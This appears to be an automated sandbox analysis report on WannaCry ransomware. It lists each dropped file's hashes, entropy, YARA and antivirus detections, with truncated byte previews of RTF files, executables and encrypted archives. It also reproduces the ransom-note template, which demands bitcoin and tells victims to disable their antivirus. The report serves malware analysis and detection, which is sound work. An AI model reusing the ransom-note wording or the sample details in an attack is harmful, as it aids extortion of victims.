                                                                                      MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                                                                      SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                                                                      SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                                                                      SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):52161
                                                                                      Entropy (8bit):4.964306949910696
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                                                                      MD5:313E0ECECD24F4FA1504118A11BC7986
                                                                                      SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                                                                      SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                                                                      SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):47108
                                                                                      Entropy (8bit):4.952777691675008
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                                                                      MD5:452615DB2336D60AF7E2057481E4CAB5
                                                                                      SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                                                                      SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                                                                      SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):41391
                                                                                      Entropy (8bit):5.027730966276624
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                                                                      MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                                                                      SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                                                                      SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                                                                      SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37381
                                                                                      Entropy (8bit):5.02443306661187
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                                                                      MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                                                                      SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                                                                      SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                                                                      SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):38483
                                                                                      Entropy (8bit):5.022972736625151
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                                                                      MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                                                                      SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                                                                      SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                                                                      SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):42582
                                                                                      Entropy (8bit):5.010722377068833
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                                                                      MD5:531BA6B1A5460FC9446946F91CC8C94B
                                                                                      SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                                                                      SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                                                                      SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):93778
                                                                                      Entropy (8bit):4.76206134900188
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                                                                      MD5:8419BE28A0DCEC3F55823620922B00FA
                                                                                      SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                                                                      SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                                                                      SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):864
                                                                                      Entropy (8bit):4.5335184780121995
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                                                                      MD5:3E0020FC529B1C2A061016DD2469BA96
                                                                                      SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                                                                      SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                                                                      SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry, Author: Florian Roth
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                      Category:dropped
                                                                                      Size (bytes):3038286
                                                                                      Entropy (8bit):7.998263053003918
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                                                                      MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                                                                      SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                                                                      SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                                                                      SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:PK..........!(................Data/PK........M..J................Data/Tor/PK..........!(................Tor/PK..........!(..t.......0.....Tor/libeay32.dll.:.t.e....6m.....Me.Vjil....!..E..T..e...*..e....,.c..o=..t.u..,....J..k-.x.V..:1u....v..7.L~..?{..rN23.w......o..N2....WU..G..G.......Ed..7..q.o.5.]w.{...wl\y..m..w...?]......n......Z]UX./h4.....]...71....e.\^1..I..MH5...k.o+..s...c|s....-#d,!..............eW...?a.......R..I..R......w.....m..#od.*q.&..g.;.C(..t.V...j.Jq%...d_.Js...Hk.j#...DH.....,8_.O...]U....t .......ks:..T...18.C.%ASZJ3.U.nl..J.@)...$...N.s.O........m.0..*e..4.....m...lI..Z..7.f-.?....;...?.SO....}..7#.L8...5.z.~.........E.S..1....7.*.0...pf.....jz.)..Y..8..^....B........p.W..r..B.....p..?......../`*Wl..D.xAi..$..d.......&..p. ..bOtE.\.......(..&A...6v..S..Q...L...3 .:.6.m7.'.......)......iH.NZ_t.;./.a..n.g...A`.T.k.........."...<.rt..3....0.{N..yy...p.z.=..#.u.u...d......mQ..*.H..2.N.BRSN...XC....).".@.._.18.&...n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65816
                                                                                      Entropy (8bit):7.997276137881339
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                                                                      MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                                                                      SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                                                                      SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                                                                      SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....8"'....].~>(...*PdIf.'.m>...2.0.`p...^...#I|..<.W.B.=....M..zxFp....0e...P...."....nhB)>....B..}.[d$......,...8.....k$.....S.w+.....N.....p/...Y.LC......9L.\!u...?hH".<d..dS%A.......Iu...nEi7I.....8.V..:F....-...,........\....}..`1?..m..5g.I'..................q.\..9`..t.....a......(|.8.L....67.gjrS.|.e...f.Fi......\...r.k.!d......8.'g1y+..'.i1t.L.>.u..:......<.fN.:Tf{..M.....W....._......_:...rR(.M..A?:...H.W.....=l......r..f..JX...:.z.rC.....f.X Qx.4....2....&w+..&kDqFU..u.............Sg..4k..<5.Zd$F.ED...1.S.d.. .eW.i....p.2..&.~S.l.R8$&q.L3.<.2....x ..by.zO.w. .hs.q.....I.1..D.F...J).&.....SD..v..m...V.....G...B`.u>K@.\_N......#.|..w.....Z.).X..[..o.(.'.~.nq.hq1.....:!.Q.P...c.KA,.3..m...j>.X.;..<.*."AU..R....Y....d]....U....).@...Q....|K.=.d.cI.x.....O...\(.%}.j..YG}...i.....R..j.`..9...5.....o..U...xu>+.$y...z... ...5......s..e...G...W.".T.'..iH..B.Sl...h..7B..E.8.....K.bRm...FE..W'_Q1...... ...A.5.}..%.../^VL.;.".w
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):3.1664845408760636
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                                                                      MD5:4FEF5E34143E646DBF9907C4374276F5
                                                                                      SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                                                                      SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                                                                      SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 89%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y......x......r......x......}.....z..y..Q..O..x..Richy..........PE..L...W.[J.....................0............... ....@..........................P...............................................!..P....@............................................................................... ...............................text............................... ..`.rdata..z.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):2.5252509618107535
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                                                                      MD5:8495400F199AC77853C53B5A3F278F3E
                                                                                      SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                                                                      SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                                                                      SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#O..g.v.g.v.g.v..2x.f.v..1|.l.v..1r.e.v.!+.d.v.g.w...v.Q.}.f.v.Richg.v.........PE..L.....[J.....................0......L........ ....@..........................P..............................................| ..<....@............................................................................... ..`............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):245760
                                                                                      Entropy (8bit):6.278920408390635
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                                      MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                                      SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                                      SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                                      SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry, Author: ReversingLabs
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
